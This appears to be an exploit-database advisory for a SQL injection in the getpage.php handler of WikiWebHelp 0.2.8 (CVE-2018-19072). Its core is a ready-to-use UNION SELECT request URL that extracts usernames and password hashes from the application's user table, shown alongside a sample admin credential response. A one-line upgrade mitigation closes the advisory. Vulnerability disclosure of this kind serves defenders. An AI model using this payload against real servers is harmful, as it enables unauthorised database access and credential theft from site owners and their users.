vendor:
WikiWebHelp
by:
Canberk BOLAT
5,5
CVSS
MEDIUM
User input not used in single quotes
89
CWE
Product Name: WikiWebHelp
Affected Version From: v0.2.8
Affected Version To: v0.2.8
Patch Exists: YES
Related CWE: CVE-2018-19072
CPE: a:richard_bondi:wikiwebhelp:0.2.8
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: None
2018
Version: v0.28 (Possible all versions)
In the file named as getpage.php user input don't used in single quotes. Its successfully exploitable. Request: http://server/handlers/getpage.php?id=9999999+UNION+SELECT+1,CONCAT_WS(0x3a,user_name,password),3,4,5,6,7+FROM+user+LIMIT+1 Response: admin:21232f297a57a5a743894a0e4a801fc3
Mitigation:
Upgrade to the latest version of the application.